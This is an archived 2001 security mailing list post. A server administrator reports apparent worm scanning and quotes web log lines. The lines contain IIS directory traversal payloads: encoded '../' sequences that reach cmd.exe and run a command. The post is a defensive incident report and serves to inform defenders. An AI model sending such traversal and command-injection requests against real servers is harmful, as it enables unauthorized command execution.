Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Possible new worm using directory traversal vulnerability?

From: thomas lakofski <thomas () 88 net>
Date: Tue, 18 Sep 2001 15:13:14 +0100 (BST)
Hi,

found this in my logs this afternoon, you may find it interesting.  from what I
can tell it's following a similar pattern of address scanning as CRII -- looks
like too many hosts, too quickly to be manual scanning:

here's a sample, the full log is at http://88.net/~thomas/codeindigo.txt [for
want of a better name]

209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" 
"-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 
"-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 
"-" "-"

regards,

-thomas


-- 
 Do what thou wilt shall be the whole of the Law.
                -- Aleister Crowley
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: